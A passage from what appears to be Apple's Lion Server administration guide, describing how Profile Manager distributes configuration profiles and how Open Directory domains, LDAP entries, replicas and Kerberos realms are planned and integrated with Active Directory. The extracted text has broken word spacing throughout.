avoid the res trictions, their VPN acces s is als o removed. Distributing configuration profiles After you defined the s ettings for users and their devices , you can dis tribute the configuration profiles to users in the following ways: Manual dis tribution You can download configuration profiles (.mobileconfig files) from Profile Manager's administration tool, then send them to your us ers via email or pos t them to a website you create. When users receive or download the file, they can install them on their device. User self-service Users can download and ins tall the settings from Profile Manager's built-in user portal. The user portal ensures that users receive the configuration profiles you as sign to them or their group. Remote Device management You can enable Profile Manager's mobile device management server, which allows you to remotely ins tall, remove, and update configuration profiles on enrolled devices . Managing a Mac lab You can us e Profile Manager to maintain a student laboratory of Macs, ens uring that they're configured identically. When you build the network system image for the lab, include configuration profiles that enroll the computers for remote device management by Profile Manager. Managing policies on devices In addition to general configuration settings , Profile Manager allows you to enforce organization policies. For example, you can specify pass code policies, define the types of networks devices can connect to, and enforce res trictions such as preventing the use of cameras on iOS devices. If you're managing the devices remotely, you can install updated policies , without user action or notification. Remotely locking or wiping a lost device Devices that you remotely manage can be locked or wiped us ing Profile Manager's administration tool. For Mac OS X Lion devices, locking s huts down the computer and installs an EFI passcode s o it cannot be started up without providing the passcode. On iOS devices, locking invokes the lock s creen and enforces the pass code, if any, installed on the device.
Wiping a device removes all user data. On iOS devices, the device is res tored to factory defaults . For iOS devices, you can also reset a user's passcode when they've forgotten it. This temporarily removes the device pas scode (for 60 minutes). When the user unlocks the device, they are immediately required to enter a new passcode that meets the criteria specified by the configuration profiles installed on the device.
Profile Manager
About configuration profiles

Configuration profiles are XML files that load settings and authorization information onto a Mac OS X Lion computer or an iOS device. They contain client security policies and restrictions, VPN configuration information, Wi-Fi settings, email and calendar accounts , authentication credentials that permit a computer to work with your enterprise systems, and several other types of settings. Some VPN and Wi-Fi settings, such as 802.1x parameters, can be set only by a configuration profile. You create configuration profiles using Profile Manager. Each configuration profile contains one or more payloads. A payload is a collection of s ettings, such as VPN specifications, in the configuration profile. Some payloads are for us e only with Mac OS X Lion computers, some are only for iOS devices, and some apply to both. When you create a configuration profile, you do so for us ers, devices, or groups of users and devices. Profile Manager tailors the payloads depending on which you choose. The s ettings will apply at that level. For example, settings that apply only to users are not available when you're creating a device configuration profile. Although you can create a single configuration profile that contains all payloads for your organization, consider creating separate profiles that let you enforce policies while granting access , as well as provide updates to s ettings that are subject to change. For example, you might create a configuration profile that sets up a user's access to email but also enforces restrictions or passcode settings. To have acces s to mes sages, users must also accept your s ecurity policies. You can distribute configuration profiles by email, on your own webpage, or by using Profile Manager's built-in user portal. When users open the email attachment or download the profile using Safari on their device, they're prompted to begin installation. You can als o use Profile Manager as a mobile device management s erver, which allows you to send new and updated profiles to users after they enroll their devices. Except for passwords , us ers generally can't change settings in a configuration profile. Accounts configured by a profile can only be removed by deleting the profile. On iOS devices, you can mark a profile as being locked to the device, so when ins talled it can removed only by wiping the device of all data (or by entering a pass code).
Profile Manager
Provide user configuration profiles

Use Server app to s tart Profile Manager service. It provides administrators with a configuration profile editor, a user portal where users can download configuration profiles, and, optionally, a mobile device management server for automatic profile distribution and other management tas ks.
1. Open Server, log in to a server, and in the Services list, click Profile Manager. 2. Click the On button. Wait a moment while Profile Manager service starts. 3. To s end the URL of the Profile Manager server to a user so they can log in and download the configuration profiles you as signed to them, click User Portal, then copy the URL from the browser window that opens. For information about how us ers interact with Profile Manager, click Open Profile Manager and choose Help from the user menu. 4. To enable Profile Manager to act as a mobile device management server, click the Configure button in the Device Management s ection of the pane. For information about mobile device management, click Open Profile Manager and choose Help from the user menu. 5. To create configuration profiles and as sign them to users, click Open Profile Manager.
When the Profile Manager webapp opens in your web brows er, log in with your adminis trator account.
Open Directory serv ices
About Open Directory
Open Directory and directory services

A directory service provides a central repository for information about computer us ers and resources in an organization. Storing administrative data in a central repository has many benefits: It reduces data entry effort. It certifies that network services and clients have consistent information about users and res ources . It simplifies administration of users and resources. It provides identification, authentication, and authorization information for other network s ervices . In education and enterprise environments, directory services are the ideal way to manage users and computing res ources. Organizations with as few as 10 people can benefit by deploying a directory service. Directory services are doubly beneficial: they simplify system and network administration, and they simplify a users experience on the network. With directory services, administrators can maintain information about all users s uch as their names, passwords, and locations of network home directoriescentrally, rather than on each computer. Directory services can also maintain centralized information about printers, computers, and other network res ources . Centralizing information about users and resources can reduce the system administrators information management burden, and each user has a centralized us er account for logging in on any authorized computer on the network. With centralized directory service and file service set up to host network home folders , wherever a user logs in, the user gets the same home folder, personal desktop, and individual preferences . The user always has acces s to pers onal networked files and can easily locate and use authorized network res ources . Directory services and directory domains A directory service acts as an intermediary between application and system software proces ses , which need information about users and resources, and the directory domains that store the information. As shown in the following illustration, Open Directory provides directory services for Macs and Mac servers.
Open Directory can access information in one or several directory domains. A directory domain stores information in a specialized database that is optimized to handle many requests for information and to find and retrieve information quickly. Processes running on Mac computers can use Open Directory services to s ave information in directory domains. For example, when you create a user account with Workgroup Manager, Open Directory stores user name and other account information in a directory domain. You can then review user account information in Workgroup Manager, which uses Open Directory to retrieve the user information from a directory domain. Other application and sys tem software processes can als o use the us er account information stored in directory domains . When someone attempts to log in to a Mac, the login process us es Open Directory services to validate the us er name and password.
A historical perspective
Like Mac OS X Lion, Open Directory has a UNIX heritage. Open Directory provides access to administrative data that UNIX systems generally keep in configuration files, which require painstaking work to maintain. (Some UNIX sys tems still rely on configuration files.) Open Directory consolidates the data and distributes it for ease of access and maintenance. Data consolidation For years , UNIX systems have stored administrative information in a collection of files located in the /etc directory, as show in the following illustration.
This scheme requires each UNIX computer to have its own set of files, and processes that are running on a UNIX computer read its files when they need administrative information. If youre experienced with UNIX, you probably know about the files in the /etc directorygroup, hos ts , hosts.equiv, master.passwd, and s o forth. For example, a UNIX process that needs a users pas sword consults the /etc/master.passwd file. The /etc/master.passwd file contains a record for each user account. A UNIX proces s that needs group information cons ults the /etc/group file. Open Directory consolidates administrative information, simplifying the interaction between processes and the administrative data they create and us e:
Processes no longer need to know how and where administrative data is stored. Open Directory gets the data for them. If a process needs the location of a users home folder, the proces s has Open Directory retrieve the information. Open Directory finds the requested information and then returns it, insulating the process from the details of how the information is stored, as shown in the following illus tration.
If you set up Open Directory to acces s administrative data from more than one directory domain, Open Directory consults the domains as needed. Some data s tored in a directory domain is identical to data stored in UNIX configuration files. For example, the home folder location, real name, user ID, and group ID are stored in user records of a directory domain ins tead of the standard /etc/passwd file. However, a directory domain stores much more data to support functions that are unique to Mac OS X Lion, s uch as s upport for managing Mac client computers. Data distribution A characteris tic of UNIX configuration files is that the administrative data they contain is available only to the computer they are stored on. Each computer has its own UNIX configuration files. With UNIX configuration files, each computer that s omeone wants to use mus t have that persons user account settings stored on it, and each computer must s tore the account s ettings for every person who can use the computer. To set up a computers network settings, the administrator must to go to the computer and enter the IP addres s and other information that identifies the computer on the network. Similarly, when us er or network information must be changed in UNIX configuration files, the adminis trator must make the changes on the computer where the files reside. Some changes, s uch as network settings, require the adminis trator to make the same changes on multiple computers. This approach becomes unwieldy as networks grow in size and complexity. Open Directory solves this problem by letting you s tore adminis trative data in a directory domain that can be managed by a network administrator from one location. Open Directory lets you distribute the information s o it is visible on a network to the computers that need it and the adminis trator who manages it, as shown in the following illustration.
Uses of directory data

Open Directory makes it possible to consolidate and maintain network information eas ily in a directory domain, but this information has value only if application and sys tem s oftware process es running on network computers access the information. Here are some ways in which Mac OS X Lion sys tem and application s oftware us e directory data:
Login: Workgroup Manager can create us er records in a directory domain, and thes e records can be used to authenticate users who log in to Mac and Windows computers. When a us er specifies a name and a pas sword in the login window, the login proces s asks Open Directory to authenticate the name and pass word. Open Directory uses the name to find the users account record in a directory domain and uses other data in the user record to validate the pass word. Folder and file access: After logging in, a user can access files and folders. Mac OS X Lion uses other data from the user record to determine the users access privileges for each file or folder. Home folders: Each user record in a directory domain stores the location of the users home folder. This is where the user keeps personal files, folders , and preferences. A users home folder can be located on a computer the user always uses or it can be located on a network file server. Automount s hare points: Share points can be configured to automount (appear automatically) in the /Network folder (the Network globe) in the Finder windows of client computers . Information about thes e automount share points is stored in a directory domain. Share points are folders, disks , or disk partitions you make access ible over the network. Mail account s ettings: Each us ers record in a directory domain s pecifies whether the user has mail service, which mail protocols to use, how to pres ent incoming mail, whether to alert the us er when mail arrives, and so forth. Resource usage: Dis k, print, and mail quotas can be stored in each user record of a directory domain. Managed client information: The administrator can manage the Mac OS X environment of us ers whos e account records are stored in a directory domain. The adminis trator makes mandatory preference settings that are s tored in the directory domain and override users personal preferences . Group management: In addition to user records, a directory domain also stores group records. Each group record affects all users who are in the group. Information in group records specifies preference settings for group members . Group records also determine access to files , folders, and computers. Managed network views: The adminis trator can set up custom views that us ers s ee when they select the Network icon in the sidebar of a Finder window. Becaus e these managed network views are stored in a directory domain, theyre available when a user logs in. Access to directory services Open Directory can access directory domains for the following kinds of directory s ervices : Lightweight Directory Access Protocol (LDAP), an open standard common in mixed environments of Macintosh, UNIX, and Windows systems. LDAP is the native directory s ervice for s hared directories in Lion Server. Local directory domain, the local directory s ervice for Mac OS X and Mac OS X Server v10.6 or later. Active Directory, the directory service of Microsoft Windows 2000 and 2003 s ervers and later. Network Information System (NIS), the directory service of many UNIX servers. BSD flat files , the legacy directory service of UNIX s ystems.
Inside a directory domain

Information in a directory domain is organized by record type. Record types are specific categories of information such as users, groups, and computers . For each record type, a directory domain can contain any number of records. Each record is a collection of attributes , and each attribute has values . If you think of each record type as a spreadsheet that contains a category of information, records are like the rows of the spreadsheet, attributes are like spreadsheet columns, and each spreadsheet cell contains values. For example, when you define a user account by using Workgroup Manager, you are creating a us er record (a record of the user record type). The settings you configure for the user accounts hort name, full name, home folder location, and so onbecome values of attributes in the user record. The us er record and the values of its attributes res ide in a directory domain. In s ome directory services, such as LDAP and Active Directory, directory information is organized by object class . Like record types, object clas ses define categories of information. An object class defines similar information, named entries, by s pecifying attributes that an entry must or may contain. For an object class, a directory domain can contain multiple entries, and each entry can contain multiple attributes . Some attributes have a single value, while others have multiple values. For example, the inetOrgPerson object class defines entries that contain
user attributes . The inetOrgPers on clas s is a standard LDAP class defined by RFC 2798. Other s tandard LDAP object class es and attributes are defined by RFC 2307. Open Directorys default object clas ses and attributes are based on these RFCs . A collection of attributes and record types or object class es provides a blueprint for the information in a directory domain. This blueprint is named the schema of the directory domain. However, Open Directory uses a directory-based s chema that is different from a locally based s tored s chema. Using a locally based s chema configuration file can be complex. The issue with an Open Directory master that services replica servers is that if you change or add an attribute to the locally based s chema of a Open Directory master, you must also make that change to each replica. Depending on the number of replicas you have, the manual update process can take an enormous amount of time. If you dont make the same s chema change locally on each replica, your replica s ervers generate errors and fail when values for the newly added attribute are s ent to replica s ervers. To eliminate this possibility of failure, Mac OS X Lion uses a directory-based s chema that is stored in the directory database and is updated for each replica server from the replicated directory database. This keeps the schema for replicas synchronized and provides greater flexibility to make changes to the schema. About the structure of LDAP entries In an LDAP directory, entries are arranged in a hierarchical treelike structure. In some LDAP directories , this structure is based on geographic and organizational boundaries. More commonly, the structure is based on Internet domain names . In a s imple directory organization, entries representing us ers, groups, computers , and other object class es are immediately below the root level of the hierarchy, as shown here:
An entry is referenced by its dis tinguis hed name (DN), which is cons tructed by taking the name of the entry, referred to as the relative dis tinguished name (RDN), and concatenating the names of its ancestor entries . For example, the entry for Anne Johnson could have an RDN of uid=anne and a DN of uid=anne, cn=us ers, dc=example, dc=com. The LDAP service retrieves data by searching the hierarchy of entries . The search can begin at any entry. The entry where the search begins is the search bas e. You can designate a search bas e by specifying the distinguis hed name of an entry in the LDAP directory. For example, the search bas e cn=users, dc=example, dc=com s pecifies that the LDAP service begin s earching at the entry whose cn attribute has a value of us ers . You can also s pecify how much of the LDAP hierarchy to s earch below the s earch base. The s earch scope can include all subtrees below the search base or the first level of entries below the s earch base. If you use command-line tools to s earch an LDAP directory, you can als o restrict the search s cope to include only the s earch base entry.
Local and shared directory domains

Where you store your servers user information and other administrative data is determined by whether the data must be shared. This information can be s tored in the servers local directory domain or in a shared directory domain. About the Local directory domain Every Mac computer has a local directory domain. A local directory domains administrative data is vis ible only to applications and system s oftware running on the computer where the domain resides . It is the first domain consulted when a user logs in or performs any operation that requires data s tored in a directory domain. When the us er logs in to a Mac, Open Directory s earches the computers local directory domain for the users record. If the local
directory domain contains the us ers record (and if the user entered the correct pas sword), the login process proceeds and the user gets access to the computer. After login, the user could choose Connect to Server from the Go menu and connect to a Mac s erver for file service. In this case, Open Directory on the s erver searches for the users record in the servers local directory domain. If the servers local directory domain has a record for the user (and if the user enters the correct pas sword), the server grants the user acces s to file s ervices , as shown below:
When you set up a Mac, its local directory domain is created and populated with records. For example, a user record is created for the user who performed the installation. It contains the user name and password entered during setup and other information, such as a unique ID for the user and the location of the us ers home folder. About shared directory domains Although, Open Directory on any Mac can store administrative data in the computers local directory domain, the real power of Open Directory is that it lets multiple Mac computers share adminis trative data by storing the data in shared directory domains. When a computer is configured to use a shared domain, administrative data in the shared domain is als o visible to applications and s ystem software running on that computer. If Open Directory does not find a users record in the local directory domain of a Mac computer, Open Directory can s earch for the users record in any s hared domains the computer has access to. In the following example, the user can access both computers becaus e the shared domain access ible from both computers contains a record for the us er.
Shared domains generally reside on servers because directory domains store extremely important data, such as the data for authenticating users. Access to servers is usually tightly res tricted to protect the data on them. In addition, directory data mus t always be available. Servers often have extra hardware features that enhance their reliability, and s ervers can be connected to uninterruptible power sources. Shared data in existing directory domains Some organizations s uch as universities and worldwide corporationsmaintain user information and other administrative data in directory domains on UNIX or Windows s ervers. Open Directory can search these non-Apple domains and shared Open Directory domains of Lion Server s ystems, as shown in the illustration below.
The order in which Mac OS X Lion searches directory domains is configurable. A search policy determines the order in which Mac OS X Lion searches directory domains. Search policies are explained in Open Directory search policies.
Guidelines and management
Open Directory planning

Keeping information in shared directory domains gives you more control over your network, gives more users acces s to the information, and makes it easier to maintain the information. The amount of control and convenience depends on the effort you put into planning s hared domains. The goal of directory domain planning is to des ign the simplest arrangement of s hared domains that gives your Mac us ers easy access to the network resources they need and that minimizes the time you spend maintaining user records and other administrative data. Planning guidelines If you do not share user and resource information among multiple Macs, very little directory domain planning is neces sary, becaus e everything can be accessed from a local directory domain. However, make sure that all individuals who us e a Mac have us er accounts on that computer. These user accounts res ide in the local directory domain on the computer. In addition, everyone who needs to us e Mac servers file s ervice, mail service, or other services that require authentication must have a user account in the servers local directory domain. With this arrangement, each user has two accounts, one for logging in to a computer and one for access ing services of a Mac server, as illus trated in the following figure.
When the us er attempts to access the file s ervice, the file server acces ses the shared directory domain to verify the user account. Because the user computer and the file server are connected to the shared directory domain, the user account on the shared directory domain is used to access a computer and the file service without needing a local account on each computer. The user logs in to the local directory domain of the Mac and then uses a different account to log in to the local directory domain of the file services server. To share information among Mac computers and servers, you mus t set up at least one s hared directory domain. With this arrangement, each user needs an account only in the shared directory domain. With this one account, the us er can log in to Mac OS X Lion on any computer thats configured to access the shared directory domain. The user can also use this same account to acces s services of any Mac server thats configured to access the s hared directory domain.
The following figure illustrates a configuration with a shared directory domain. The figure s hows a user logging in to a Mac using a shared directory domain account. Then the shared directory domain account is also us ed to access a file service.
In many organizations , a single shared directory domain is adequate. It can handle hundreds of thousands of users and thous ands of computers sharing the same res ources, s uch as printer queues, share points for home directories, s hare points for applications, and share points for documents. Replicating the shared directory domain can increas e the capacity or performance of the directory sys tem by configuring multiple servers to handle the directory sys tem load for the network. Larger, more complex organizations can benefit from extra shared directory domains. The following figure shows how one such complex organization might organize its directory domains.
If you have a large organization and you want to increase the performance and capacity of your network directory domain, you can add multiple directory domains to your network. Also, by using multiple directory domains you can load-balance your corporate directory domain. There are different methods of configuring multiple directory domains. By analyzing your network topology you can determine the bes t method for your network. The following are optional configurations of multiple directory domains: Open Directory with an exis ting domain. You can configure an Open Directory server on a network that has an exis ting directory domain such as an Active Directory or Open Directory domain. For example, if your organization has an existing Active Directory server that supports Windows and Mac client computers, you can add an Open Directory server to better support Mac users . The two s ervers can exist on the same network and provide redundant directory domains for Windows and Mac clients. You als o configure Lion Server to handle cross -domain authorization if a Kerberos realm exists. If you have an exis ting Active Directory server, you can connect an Open Directory server to it and you can eas ily add users from the Active Directory server into your Open Directory server. Thes e users are referred to as augment users . For more information about augment records , see Integrate with exis ting directory domains. For more information about adding augments to user records, see Us er Management. Open Directory Master Server with replicas. You can also create an Open Directory master server with replicas . The replica servers have a copy of the Open Directory masters directory domain for load balancing and redundancy.
For example, your organization could have an Open Directory master at your headquarters and place replicas of that server at each remote location. This prevents users at remote locations from experiencing delayed logins. Cascading replication. You can also use cascading replication, where replicas of an Open Directory master have replicas. If a replica is a direct member of the Open Directory master and it has replicas it is called a relay. For example, If your organization has 32 replicas and you must add another replica, you can reorganize your network topology and have your replicas become relays by adding replicas to a replica (or relay). Cascading replication load-balances the Open Directory mas ter by minimizing the number of replicas it mus t directly manage. Estimating directory and authentication requirements In addition to cons idering how to dis tribute directory data among multiple domains, you mus t also consider the capacity of each directory domain. The s ize of your directory domain depends on your network requirements. One factor is the performance of the database that stores directory information. The LDAP directory domain of a Mac s erver uses the Berkeley DB database, which remains efficient with 200,000 records . A server hosting a directory domain of that size must have sufficient hard disk space to store all the records . The number of connections a directory service can handle is harder to measure because directory service connections occur in the context of the connections of all services the server provides. With Lion Server, a server dedicated to Open Directory has a limit of 1,000 s imultaneous client computer connections . The Open Directory server can provide LDAP and authentication services to more client computers, because not all computers need these services at the same time. Each computer connects to the LDAP directory for up to two minutes, and connections to the Open Directory Password Server are even more brief. Determining what the fraction isthe percentage of computers that make connections at the same timecan be difficult. For example, computers that have a single user who spends all day working on graphics files need Open Directory services relatively infrequently. In contrast, computers in a lab have many users logging in throughout the day, each with a different set of managed client preference s ettings, and these computers place a relatively high load on Open Directory services. In general, you can correlate Open Directory us age with login and logout. These activities generally dominate directory and authentication services for any sys tem. The more frequently users log in and out, the fewer computers an Open Directory server (or any directory and authentication server) can s upport. You need more Open Directory servers if users log in frequently. You can get by with fewer Open Directory servers if work ses sions are long and login is infrequent. Identifying servers for hosting shared domains If you need more than one shared domain, identify the servers where the s hared domains should res ide. Shared domains affect many users, so they s hould reside on Mac servers that have the following characteristics : Restricted physical access Limited network access High-availability technologies, such as uninterruptible power supplies Select computers that are not replaced frequently and that have adequate capacity for expanding directory domains. Although you can move a shared domain after it is set up, it might be necess ary to reconfigure the search policies of computers that connect to the shared domain so us ers can continue to log in.
Replicate Open Directory services

Lion Server supports replication of the LDAP directory service, the Open Directory Pass word Server, and the Kerberos KDC. By replicating your directory and authentication services you can: Move directory information clos er to a population of users in a geographically distributed network, improving performance of directory and authentication services to these users. Achieve redundancy, so users see little disruption in s ervice if a directory system fails or becomes unreachable. One server has a primary copy of the shared LDAP directory domain, Open Directory Pas sword Server, and Kerberos KDC. This
server is referred to as an Open Directory master. Each Open Directory replica is a separate server with a copy of the masters LDAP directory, Open Directory Password Server, and Kerberos KDC. An Open Directory s erver can have up to 32 replicas. Each replica can have 32 replicas of its elf, providing 1,056 replicas in a twotier hierarchy. Access to the LDAP directory on a replica is read only. Changes to user records and other account information in the LDAP directory can be made only on the Open Directory master. The Open Directory master updates its replicas when there are changes to the LDAP directory. The master can update replicas every time a change occurs , or you can set up a schedule so updates occur at regular intervals. The fixed s chedule option is best if replicas are connected to the mas ter by a s low network link. Pas swords and pass word policies can be changed on any replica. If a users pass word or password policy are changed on more than one replica, the mos t recent change prevails. The updating of replicas relies on the clocks of the master and replicas being in sync. If replicas and the master have different times , updating could be arbitrary. The date, time, and time zone information mus t be correct on the master and replicas, and they should use the same network time service to keep their clocks in s ync. Avoid having only one replica on either s ide of a slow network link. If a replica is separated from other replicas by a slow network link and the one replica fails, clients of the replica will fail over to a replica on the other side of the slow network link. As a result, their directory services can slow markedly. If your network has a mix of Mac OS X Server v10.6 and Lion Server, one version cant be a replica of a mas ter of the other version. An Open Directory master of Lion Server wont replicate to v10.6, nor will an Open Directory mas ter of v10.6 replicate to Lion Server:
Replica v ersion Lion Server replica Mac OS X Server v10.6 replica Lion Serv er master yes No Mac OS X Serv er v 10.6 master no Yes
Replica sets A replica set is an automatic configuration that requires each service that Open Directory manages (LDAP, Pass word Server, and Kerberos ) to look for and use the same replica server. This helps ensure that client computers choose the s ame replica server when using Open Directory s ervices and helps prevent slow login. Cascading replication Mac OS X v10.4 used a hub-spoke model for replicating Open Directory master servers . This required each Open Directory master to maintain a transaction record for each replica server. The following illus tration shows the hub-spoke model used in Mac OS X v10.4.
In addition, there was no predefined limit to how many replica s ervers an Open Directory master could manage. If an Open Directory master had 1,000 replicas to manage, it could have performance issues if replicas continued to be added. This is similar to having one manager for 1,000 employees, which is an unmanageable situation. Mac OS X Server v10.5 and later use cascading replication to improve scalability and resolve performance issues with the older hub-s poke model of replication. The use of cas cading replication helps limit the number of replica servers that can be supported by a s ingle Open Directory master server.
A single Open Directory master server can have up to 32 replicas and each replica can have up to 32 replicas, which gives you 1,056 replicas of a single Open Directory master server. This creates a two-tier hierarchy of replica s ervers. The first tier of replicas, which are the direct members of the Open Directory master, are called relays if they have replicas , because they relay the data to the s econd tier of replicas. Also, cas cading replication does not require that a single Open Directory mas ter server maintain a transaction record of each replica server. The mas ter server only keeps a maximum of 32 replica transaction records, which improves performance. The following illus tration shows the two-tier hierarchy of the cas cading replication model.
Planning the upgrade of multiple Open Directory replicas If your Open Directory master manages more than 32 replicas, your organization must migrate to a cas cading replication. The cas cading replication model will improve your Open Directory s erver performance. When planning for your migration, consider the locations of your replica servers and your network topology to help determine how to reorganize your replicas into a hierarchal s tructure. For example, you do not want to have an Open Directory master on the West coas t replicating to a replica on the East coast. Note: If your Open Directory master has fewer than 32 replicas, migration is not necessary. Load balancing in small, medium, and large environments Do not use s ervice load-balancing s oftware from third parties with Open Directory s ervers. Load-balancing software can cause unpredictable problems for Open Directory computers. It can interfere with the automatic load balancing and failover behavior of Open Directory in Mac OS X Lion and Lion Server. Mac computers seek the nearest available Open Directory s ervermaster or replica. A computers nearest Open Directory master or replica is the one that responds most quickly to the computers request for an Open Directory connection. Replication in a multibuilding campus A network that spans multiple buildings might have slower network links between buildings than the link within each building. The network links between buildings might also be overloaded. These conditions can advers ely affect the performance of computers that get Open Directory s ervices from a server in another building. As a result, you may want to set up an Open Directory replica in each building. Depending on need, you may even want to set up an Open Directory replica on each floor of a multistory building. Each replica provides efficient directory and authentication s ervices to client computers in its vicinity. The computers do not need to make connections with an Open Directory server across the slow, crowded network link between buildings. Having more replicas has a disadvantage. Replicas communicate with each other and with the master over the network. This network communication overhead increases as you add replicas . Adding too many replicas can add more network traffic between buildings in the form of replication updates than it removes in the form of Open Directory client communications. When deciding how many replicas to deploy, consider how heavily the computers use Open Directory s ervices . If the computers are relatively light users of Open Directory s ervices and your buildings are connected by fairly fast network links (such as 100 Mbps Ethernet), you probably do not need a replica in each building. You can reduce the communication overhead between Open Directory replicas and the mas ter by s cheduling how often the Open Directory master updates the replicas. You might not need the replicas updated every time a change occurs in the master. Scheduling less frequent updates of replicas improves network performance.
Using an Open Directory master, replica, or relay with NAT If your network has an Open Directory server on the private network s ide of a network addres s translation (NAT) router (or gateway), including the NAT router of Mac server, only computers on the private network side of the NAT router can connect to the Open Directory servers LDAP directory domain. Computers on the public network side of the NAT router cant connect to the LDAP directory domain of an Open Directory master or replica thats on the private network side. If an Open Directory server is on the public network s ide of a NAT router, computers on the private network and the public network sides of the NAT router can connect to the Open Directory servers LDAP directory. If your network supports mobile clients such as MacBooks that move between the private LAN of your NAT gateway and the Internet, you can s et up VPN service for mobile users so they can use VPN to connect to the private network and the Open Directory domain. Open Directory master and replica compatibility The Open Directory master and its replicas must use the same version of Lion Server. In addition: An Open Directory master us ing Lion Server wont replicate to Mac OS X Server v10.6. Mac OS X Server v10.6 or later cant be a replica of an Open Directory mas ter us ing Lion Server. An Open Directory master us ing Lion Server can replicate to an Open Directory replica using Lion Server. If you have an Open Directory mas ter and replicas that use Mac OS X Server v10.6, upgrade them to Lion Server at the s ame time. Firs t, upgrade the master; then, upgrade the replicas. Clients of the mas ter and replicas continue to receive directory and authentication services during the upgrade. While you are upgrading the master, its clients fail over to the neares t replica. When you upgrade replicas one at a time, clients fail back to the upgraded master. Upgrading an Open Directory mas ter from Mac OS X Server v10.6 or later severs ties to existing replicas. After upgrading each Open Directory replica to Lion Server, it is a standalone directory service and you must make it a replica again. Mixing Active Directory and Open Directory master and replica services There are some s pecial considerations when introducing Open Directory Servers into an Active Directory environment. If precautions are not taken, mixed results will occur on client and server functionality. Also, avoid mixing Authenticated Directory Binding and Active Directory on the same client or server. Authenticated binding makes use of Kerberos as does Active Directory. Using both will cause unexpected behavior or nonfunctioning authentication services unles s care is taken, as detailed below. When mixing Open Directory and Active Directory, you can only us e Kerberos credentials from one s ystem or another for single sign-on purposes . You cannot have users exist in Active Directory and Open Directory and use both Kerberos credentials to use single sign-on to acces s a server that is Kerberized. In other words, you cannot sign into an Active Directory account and expect to us e single sign-on with a server that is part of the Open Directory Kerberos realm. Kerberos is us ed in Active Directory and Open Directory environments. Kerberos makes ass umptions about determining the realm of a s erver when Kerberos tickets are used. The following is an example of mixing an Active Directory Kerberos realm with an Open Directory master Kerberos realm: Active Directory Domain = example.com Active Directory Kerberos realm = EXAMPLE.COM Open Directory Server mas ter = server1.example.com Open Directory Kerberos realm = SERVER1.EXAMPLE.COM When Kerberos attempts to obtain a ticket-granting-ticket (TGT) for using LDAP with server1.example.com, it reques ts ldap/server1.example.com@EXAMPLE.COM unles s the domain_realm entity is present in the configuration. The domain_realm entity for Open Directory assumes that all example.com entities belong to SERVER1.EXAMPLE.COM. This prevents connectivity to the Active Directory domain named example.com. To mix Authenticated Directory Binding and Active Directory, your Active Directory Domain and Open Directory realms and servers must be in a different hierarchy. For example: Active Directory Domain = example.com
Active Directory Kerberos realm = EXAMPLE.COM Open Directory Server mas ter = server1.od.example.com Open Directory Server realm = OD.EXAMPLE.COM Or Active Directory Domain = ads.example.com Active Directory Kerberos realm = ADS.EXAMPLE.COM Open Directory Server mas ter = server1.od.example.com Open Directory Kerberos realm = OD.EXAMPLE.COM In both examples, a new DNS domain zone must be created, and forward and reverse DNS entries must exist for the servers so that if an IP address is us ed for the Open Directory s erver, it gets the expected name. For example, IP addres s server1.od.example.com = 10.1.1.1, so a lookup of 10.1.1.1 should be equal to server1.od.example.com, not server1.example.com.
Integrate with existing directory domains

If your network has a directory domain, you can integrate another directory domain server into your network. There are many reasons why you might want to have two directory domains, s uch as providing better support and management of network computers . Integrating with cross-domain authorization If your network has a directory domain, you can add another directory domain server to your network that us es your existing directory domains databas e to authorize user acces s. This configuration is referred to as cross -domain authorization and requires that your servers s upport Kerberos. If you use cros s-domain authorization, one server is a pseudomaster server and the other is a s ubordinate s erver. Us ers authenticate to the pseudomaster server using a method of authentication, so if a user authenticates, he or she receives a Kerberos ticket. When the us er attempts to access a s ervice that is offered by the subordinate server, the s ubordinate s erver accepts and validates the users Kerberos ticket, which was given by the pseudomaster server, to authorize the user. The Kerberos ticket has Privilege Attribute Certificate (PAC) information, which contains the us er name, user IDs (UIDs), and group membership IDs (GIDs ). The s ubordinate s erver uses this information to verify that the user is authorized to use the s ervice. It does so by comparing the UID or GID to the acces s control list (ACL) of the service the user is requesting to access . Using cros s-domain authorization keeps you from needing to create different user names and passwords for your subordinate directory domain server. You can use the same user names and pass words from the corporate directory domain along with the PAC information to authorize user access . Cross-domain authorization is an ideal configuration if you are not permitted to directly edit groups in the corporate directory domain. You can us e cross-domain authorization between an Active Directory s erver and a Mac OS X Lion Open Directory server or between two Mac OS X Lion Open Directory servers. Cross-domain authorization does not work on a Mac OS X v10.4 server. To us e PAC information, the pseudomaster server must have a Kerberos realm for the s ubordinate s erver to join. To create a s ubordinate for a directory s ystem you must join your server to an Active Directory or Open Directory server that has Kerberos configured and running. Then, us ing Server Admin, you must promote your Open Directory server to an Open Directory master. The subordinate server determines that it is subordinate to an Active Directory or Open Directory server and configures itself accordingly. You can also have a replica of your subordinate Open Directory server. To create a replica of a s ubordinate directory s erver, join your server to the ps eudomaster and subordinate server. Then configure the server to be a replica of the subordinate server. If you dont join the server to both the pseudo-master and subordinate server, it is blocked or fails to become a replica. Integrating with a magic triangle
A magic triangle, also referred to as the golden triangle, is the connecting of two directory domains where one controls the authentication and the other manages Mac OS X Lion settings. Mac OS X Lion s upports the connection of an Active Directory server to an Open Directory s erver or two Open Directory s ervers connected together. This creates a magic triangle that is made up of three parts : the directory server providing authentication, the second directory s erver, and the Mac client computers. When configuring a magic triangle, one server must be the primary s erver and the other the secondary server. The s econdary server must join the primary server and its Kerberos realm. There can only be one Kerberos realm in a magic triangle. For example, you can configure an Active Directory server as a primary server to host the Kerberos Distribution Center (KDC) and contain user and group records. Then you can configure an Open Directory server as a s econdary s erver and connect it to the Active Directory server and its Kerberos realm. The Active Directory server manages authentication requests while the Open Directory server manages preference and policy settings of client computers. All services of your Open Directory servers can be Kerberized through the Kerberos realm of the Active Directory server. Client computers are connected to the Active Directory and Open Directory servers. Integrating with augment records If you integrate with an existing directory domain using a magic triangle, you can augment us er records from the primary directory domain to the secondary directory domain. When you augment user records from a primary directory domain to a secondary directory domain, you can add data to these records. These us er records are labeled as augmented in Workgroup Manager. The augmented record information is us ed by the secondary directory domain and is not viewable from the primary directory domain server where the original records reside. For example, if you configure a magic triangle with an Active Directory s erver as the primary s erver and an Open Directory server as the secondary server, you can augment user records from the Active Directory server to the Open Directory server. After you augment these records you can add information, s uch as setting a login picture. Augments do not affect the original us er record. Augments provide additional information s pecific to the directory domain the augment user logs in to. By keeping the users in the Active Directory domain and augmenting them into the Open Directory domain, users can us e Mac server-specific features. Als o, it prevents us ers from needing two pass words or accounts. Integrating without schema changes Mac OS X Lion integrates with most LDAP-based directories without needing to change the schema of your directory server. However, s ome record types might not be recognized or maintained by your servers directory schema. When you 